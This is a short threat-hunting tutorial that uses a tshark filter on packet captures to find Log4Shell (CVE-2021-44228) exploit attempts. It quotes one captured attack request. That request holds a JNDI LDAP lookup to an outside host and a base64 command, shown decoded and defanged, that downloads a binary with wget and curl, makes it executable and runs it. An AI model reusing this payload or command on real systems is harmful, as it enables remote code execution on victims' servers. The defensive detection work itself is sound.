So, if you read my previous article; Hunting for Log4j RCE (CVE-2021-44228) using Splunk & Excel, last time we leveraging Splunk as our platform to hunt event/logs related to this Log4J vulnerability.
This time, we’re using RSA Netwitness; which we going to hunt this Log4Shell attempt thru pcap.
If you never seen how’s the RSA Netwitness interface looks like, here are the screenshot of the tools:
After you have gathered the pcap, we can use tshark to extract relevant field/result that we want.
Tshark command and filters that we’ll using:
"C:\Program Files\Wireshark\tshark.exe" -r your_pcap.pcap -Y "ip contains Base64 && http.request && ip contains jndi" -T fields -e ip.src -e tcp.srcport -e ip.dst -e tcp.dstport -e http.request.method -e http.request.uri -e http.response.code -e http.user_agent -e http.referer -E header=y -E separator=; > out.txt
Example of the output:
ip.src tcp.srcport ip.dst tcp.dstport http.request.method http.request.uri http.response.code http.user_agent http.referer
143.244.156.104 37058 X.X.X.X 8080 GET / ${jndi:ldap://135.148.132.224:1389/Basic/Command/Base64/d2dldCBodHRwOi8vMTUyLjY3LjYzLjE1MC9weTsgY3VybCAtTyBodHRwOi8vMTUyLjY3LjYzLjE1MC9weTsgY2htb2QgNzc3IHB5OyAuL3B5IHJjZS54ODY=}
If we decoded the base64 above:
wget http://152[.]67[.]63[.]150/py; curl -O http://152[.]67[.]63[.]150/py; chmod 777 py; ./py rce.x86